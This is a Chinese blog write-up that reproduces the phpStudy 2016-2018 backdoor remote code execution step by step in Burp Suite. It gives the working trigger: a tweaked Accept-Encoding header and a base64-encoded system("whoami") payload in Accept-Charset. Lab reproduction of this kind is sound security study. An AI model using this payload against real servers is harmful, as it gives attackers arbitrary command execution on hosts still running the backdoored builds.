phpstudy_2016-2018_rce_backdoor 漏洞复现

最新推荐文章于 2024-11-26 20:43:22 发布
最新推荐文章于 2024-11-26 20:43:22 发布
阅读量340 收藏
点赞数 1
分类专栏: 渗透测试 文章标签: linux 运维 服务器 网络 笔记 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/133855787
版权

phpstudy_2016-2018_rce_backdoor 漏洞复现

Remote Command Execute

  • 打开 bp

    image-20231016121951332

  • 打开代理浏览器

    image-20231016122015833

  • 访问 php 页面

    image-20231016122049698

    image-20231016122109271

  • 回到 bp

    查看 http 历史,找到刚刚访问的 php 页面

    image-20231016122211545

  • 发送到 Repeater

    image-20231016122237107

  • 转到 Repeater

    image-20231016122308061

  • php 页面请求内容加

    Accept-Charset:

  • 修改 Accept-Encoding,删除 deflate 前的空格

    Accept-Encoding: gzip,deflate

  • 将要执行的命令写入到 system(“”) 中如

    system("whoami");

  • Decoder 模块 base64 编码

    # 对 system("whoami") 编码
c3lzdGVtKCJ3aG9hbWkiKTs=

    image-20231016121748478

  • 将编码放到 Accept-Charset:

    Accept-Charset: c3lzdGVtKCJ3aG9hbWkiKTs=

    image-20231016122431232

  • 点击 Send 发送

  • 查看返回的数据

  • 成功回显执行的命令

    image-20231016122527558

gjl_
关注
专栏目录
phpstudy2016 RCE漏洞验证
m0_56578216的博客
09-21 543
PHPStudyRCE(Remote Code Execution),也称为phpstudy_backdoor漏洞,是指软件中存在的一个远程代码执行漏洞
https phpstudy_phpStudy 隐藏后门 [漏洞插件编写]
weixin_39602280的博客
11-29 139
0x00 漏洞描述 PhpStudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。 近日,使用广泛的PHPStudy环境集成程序包被公告疑似遭遇黑客攻击,程序包自带PH...
漏洞复现】之PhpStudy“后门”利用复现、修复及使用脚本快速复现(最全,转自https://www.cnblogs.com/yankaohaitaiwei/p/11604762.html)
qq_45290991的博客
10-07 1276
漏洞复现】之PhpStudy“后门”利用复现、修复及使用脚本快速复现 (本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦)   该复现参考网络中的文章,该漏洞复现仅仅是为了学习交流,严禁非法使用!!!    一、事件背景   北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后...
phpStudy后门漏洞复现
LuckySec
08-20 6401
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。 影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45 更多漏洞细节
PhpStudy BackDoor 2019漏洞
qq_45521281的博客
05-05 4389
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 基础介绍 事件背景 北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发,近百万PHP用户中超过67万用户已被黑客控...
phpstudy_2016-2018_rce_backdoor漏洞复现
weixin_46365325的博客
07-31 680
PHP study 软件是国内的一款免费的 PHP 调试环境的程序集成包,通过集成 Apache、PHP、Mysql、PhpMyAdmin 等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。攻击者可以利用该漏洞执行 PHP 命令,也可以称作 phpstudy 后门。模块中,至少有2个版本:phpStudy2016phpstudy 2018自带的php-5.2.17、php-5.4.45。使用bp编码后进行上传,在网页查看是否上传成功,使用蚁剑进行连接。更改 bp 字体为楷体24pt。
phpstudy_2016-2018_rce漏洞复现
m0_64583632的博客
11-10 938
phpstudy2016phpstudy2018rce漏洞复现
phpstudy_2016-2018_rce_backdoor后门漏洞复现
qq_58683895的博客
10-16 416
攻击者可以利用该漏洞执行PHP 命令,也可以称作phpStudy 后门。
PhpStudy2016-2018-RCE 漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-14 1451
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
phpstudy_2016-2018_rce_hackdoor利用脚本
weixin_52963334的博客
09-22 86
漏洞利用poc编写
phpstudy后门简单分析
fa1lr4in的小博客
09-25 1765
感谢pcat师傅的文章:https://mp.weixin.qq.com/s/dIDfgFxHlqenKRUSW7Oqkw 20号得知phphstudy有后门,不知道官网的是不是也被入侵了,当时没有进行查看,,,由于当时正在秋招面试比较忙,鸽了几天有了下文: 被中马的为php_xmlrpc.dll这个dll文件,这个可以通过查找泄露字符串很容易通过脚本实现,就不贴了,可以以eval为关键...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5703
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
phpstudy后门-插件、环境、复现
MzHeader的博客
10-24 1582
1.1 后门检测 影响: phpstudy 2016 php5.4 phpstudy2018 php-5.2.17和php-5.4.45 位置: 通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中 phpStudy2016phpStudy2018自带的php-5.2.17、php-5.4.45 phpStudy2016路径 php\php-5.2.17\ext\php_xmlr...
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现
kkkkk0826的专栏
10-13 692
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL 数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被...
Linux第97步_使用“Linux自带的按键驱动程序”测试“按键输入”
weixin_42550185的博客
11-23 631
使用“Linux自带的按键驱动程序”测试“按键输入”,熟悉图形化配置。
Linux中的“块”是什么
最新发布
Lenn Louis' Scribe
11-26 100
参考资料:https://it.0voice.com。
按键 芯片型号mpr121 linux 驱动程序
baidu_37552881的博客
11-26 351
【代码】按键 芯片型号mpr121 linux 驱动程序。
linux从0到1——shell编程7
sucker的博客
11-22 1020
接着,通过((i++))这一语句对变量i进行自增操作。每次循环结束后、的值就会比上一次循环时增加1,以便在下次循开始时进行新的条件判断。先是通过i=1初始化变量i,然后通过,while((Si
麒麟系统状态监控
qq_17215799的博客
11-25 57
grep 命令的组合来查看某进程是否在运行。除了 ps ax 命令提供的信息外,ps aux 还显示进程拥有者的名字,进程占用CPU 和内存的百分比,以。对于每一个列出的进程,ps ax 命令会显示进程的 PID,进程依附的终端,进程状态,进程占用的 CPU。ps命令会生成一个静态列表,列表里的进程是当你执行命令时系统运行的进程的一个快照。字节为单位显示虚拟内存大小和未交换物理内存的大小,进程开始运行的时间。例如:如果想显示进程的所有者,使用如下命令:ps -aux。Ps命令显示系统运行进程的信息。
复现旧版phpStudy_2014网站集成环境搭建教程
资源摘要信息:"phpStudy_2014是针对网站开发和测试环境搭建的集成软件包。它集成了Apache和Nginx服务器、MySQL数据库以及PHP解释器,为开发者提供了一个方便快捷的本地环境搭建解决方案。phpStudy_2014的特点在于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值